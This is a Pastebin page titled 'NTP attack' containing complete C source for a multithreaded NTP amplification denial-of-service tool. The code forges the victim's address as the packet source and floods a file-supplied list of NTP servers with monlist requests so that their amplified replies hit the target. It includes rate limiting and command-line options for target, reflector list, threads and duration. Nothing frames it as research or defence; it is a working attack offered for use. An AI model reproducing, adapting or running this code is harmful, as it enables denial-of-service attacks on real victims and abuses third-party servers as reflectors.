Advertisement
Tor

NTP attack

Tor
Aug 10th, 2015
8,396
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
C 6.21 KB | None | 0 0
  1. /* NTP amplification. */
  2.  
  3. #include <time.h>
  4. #include <pthread.h>
  5. #include <unistd.h>
  6. #include <stdio.h>
  7. #include <stdlib.h>
  8. #include <string.h>
  9. #include <sys/socket.h>
  10. #include <netinet/ip.h>
  11. #include <netinet/udp.h>
  12. #include <arpa/inet.h>
  13. #define MAX_PACKET_SIZE 8192
  14. #define PHI 0x9e3779b9
  15. static uint32_t Q[4096], c = 362436;
  16. struct list
  17. {
  18.         struct sockaddr_in data;
  19.         struct list *next;
  20.         struct list *prev;
  21. };
  22. struct list *head;
  23. volatile int limiter;
  24. volatile unsigned int pps;
  25. volatile unsigned int sleeptime = 100;
  26. struct thread_data{ int thread_id; struct list *list_node; struct sockaddr_in sin; };
  27. void init_rand(uint32_t x)
  28. {
  29.         int i;
  30.         Q[0] = x;
  31.         Q[1] = x + PHI;
  32.         Q[2] = x + PHI + PHI;
  33.         for (i = 3; i < 4096; i++)
  34.         {
  35.         Q[i] = Q[i - 3] ^ Q[i - 2] ^ PHI ^ i;
  36.         }
  37. }
  38. uint32_t rand_cmwc(void)
  39. {
  40.         uint64_t t, a = 18782LL;
  41.         static uint32_t i = 4095;
  42.         uint32_t x, r = 0xfffffffe;
  43.         i = (i + 1) & 4095;
  44.         t = a * Q[i] + c;
  45.         c = (t >> 32);
  46.         x = t + c;
  47.         if (x < c) {
  48.         x++;
  49.         c++;
  50.         }
  51.         return (Q[i] = r - x);
  52. }
  53. unsigned short csum (unsigned short *buf, int nwords)
  54. {
  55.         unsigned long sum = 0;
  56.         for (sum = 0; nwords > 0; nwords--)
  57.         sum += *buf++;
  58.         sum = (sum >> 16) + (sum & 0xffff);
  59.         sum += (sum >> 16);
  60.         return (unsigned short)(~sum);
  61. }
  62. void setup_ip_header(struct iphdr *iph)
  63. {
  64.         iph->ihl = 5;
  65.         iph->version = 4;
  66.         iph->tos = 0;
  67.         iph->tot_len = sizeof(struct iphdr) + sizeof(struct udphdr) + 8;
  68.         iph->id = htonl(54321);
  69.         iph->frag_off = 0;
  70.         iph->ttl = MAXTTL;
  71.         iph->protocol = IPPROTO_UDP;
  72.         iph->check = 0;
  73.         iph->saddr = inet_addr("192.168.3.100");
  74. }
  75. void setup_udp_header(struct udphdr *udph)
  76. {
  77.         udph->source = htons(5678);
  78.         udph->dest = htons(123);
  79.         udph->check = 0;
  80.         memcpy((void *)udph + sizeof(struct udphdr), "\x17\x00\x03\x2a\x00\x00\x00\x00", 8);
  81.         udph->len=htons(sizeof(struct udphdr) + 8);
  82. }
  83. void *flood(void *par1)
  84. {
  85.         struct thread_data *td = (struct thread_data *)par1;
  86.         char datagram[MAX_PACKET_SIZE];
  87.         struct iphdr *iph = (struct iphdr *)datagram;
  88.         struct udphdr *udph = (/*u_int8_t*/void *)iph + sizeof(struct iphdr);
  89.         struct sockaddr_in sin = td->sin;
  90.         struct  list *list_node = td->list_node;
  91.         int s = socket(PF_INET, SOCK_RAW, IPPROTO_TCP);
  92.         if(s < 0){
  93.         fprintf(stderr, "error. got r00t?\n");
  94.         exit(-1);
  95.         }
  96.         init_rand(time(NULL));
  97.         memset(datagram, 0, MAX_PACKET_SIZE);
  98.         setup_ip_header(iph);
  99.         setup_udp_header(udph);
  100.         udph->source = htons(rand() % 65535 - 1026);
  101.         iph->saddr = sin.sin_addr.s_addr;
  102.         iph->daddr = list_node->data.sin_addr.s_addr;
  103.         iph->check = csum ((unsigned short *) datagram, iph->tot_len >> 1);
  104.         int tmp = 1;
  105.         const int *val = &tmp;
  106.         if(setsockopt(s, IPPROTO_IP, IP_HDRINCL, val, sizeof (tmp)) < 0){
  107.         fprintf(stderr, "error. u dun goofed.\n");
  108.         exit(-1);
  109.         }
  110.         init_rand(time(NULL));
  111.         register unsigned int i;
  112.         i = 0;
  113.         while(1){
  114.         sendto(s, datagram, iph->tot_len, 0, (struct sockaddr *) &list_node->data, sizeof(list_node->data));
  115.         list_node = list_node->next;
  116.         iph->daddr = list_node->data.sin_addr.s_addr;
  117.         iph->id = htonl(rand_cmwc() & 0xFFFFFFFF);
  118.         iph->check = csum ((unsigned short *) datagram, iph->tot_len >> 1);
  119.         pps++;
  120.         if(i >= limiter)
  121.         {
  122.         i = 0;
  123.         usleep(sleeptime);
  124.         }
  125.         i++;
  126.         }
  127. }
  128. int main(int argc, char *argv[ ])
  129. {
  130.         if(argc < 5){
  131.         fprintf(stderr, "Invalid parameters!\n");
  132.         fprintf(stdout, "Usage: %s [IP] [file] [threads] [limiter] [time]\n", argv[0]);
  133.         exit(-1);
  134.         }
  135.         srand(time(NULL));
  136.         int i = 0;
  137.         head = NULL;
  138.         fprintf(stdout, "Opening sockets...\n");
  139.         int max_len = 128;
  140.         char *buffer = (char *) malloc(max_len);
  141.         buffer = memset(buffer, 0x00, max_len);
  142.         int num_threads = atoi(argv[3]);
  143.         int maxpps = atoi(argv[4]);
  144.         limiter = 0;
  145.         pps = 0;
  146.         int multiplier = 20;
  147.         FILE *list_fd = fopen(argv[2],  "r");
  148.         while (fgets(buffer, max_len, list_fd) != NULL) {
  149.         if ((buffer[strlen(buffer) - 1] == '\n') ||
  150.         (buffer[strlen(buffer) - 1] == '\r')) {
  151.         buffer[strlen(buffer) - 1] = 0x00;
  152.         if(head == NULL)
  153.         {
  154.         head = (struct list *)malloc(sizeof(struct list));
  155.         bzero(&head->data, sizeof(head->data));
  156.         head->data.sin_addr.s_addr=inet_addr(buffer);
  157.         head->next = head;
  158.         head->prev = head;
  159.         } else {
  160.         struct list *new_node = (struct list *)malloc(sizeof(struct list));
  161.         memset(new_node, 0x00, sizeof(struct list));
  162.         new_node->data.sin_addr.s_addr=inet_addr(buffer);
  163.         new_node->prev = head;
  164.         new_node->next = head->next;
  165.         head->next = new_node;
  166.         }
  167.         i++;
  168.         } else {
  169.         continue;
  170.         }
  171.         }
  172.         struct list *current = head->next;
  173.         pthread_t thread[num_threads];
  174.         struct sockaddr_in sin;
  175.         sin.sin_family = AF_INET;
  176.         sin.sin_addr.s_addr = inet_addr(argv[1]);
  177.         struct thread_data td[num_threads];
  178.         for(i = 0;i<num_threads;i++){
  179.         td[i].thread_id = i;
  180.         td[i].sin= sin;
  181.         td[i].list_node = current;
  182.         pthread_create( &thread[i], NULL, &flood, (void *) &td[i]);
  183.         }
  184.         fprintf(stdout, "Sending attack..\n");
  185.         for(i = 0;i<(atoi(argv[5])*multiplier);i++)
  186.         {
  187.         usleep((1000/multiplier)*1000);
  188.         if((pps*multiplier) > maxpps)
  189.         {
  190.         if(1 > limiter)
  191.         {
  192.         sleeptime+=100;
  193.         } else {
  194.         limiter--;
  195.         }
  196.         } else {
  197.         limiter++;
  198.         if(sleeptime > 25)
  199.         {
  200.         sleeptime-=25;
  201.         } else {
  202.         sleeptime = 0;
  203.         }
  204.         }
  205.         pps = 0;
  206.         }
  207.         return 0;
  208. }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement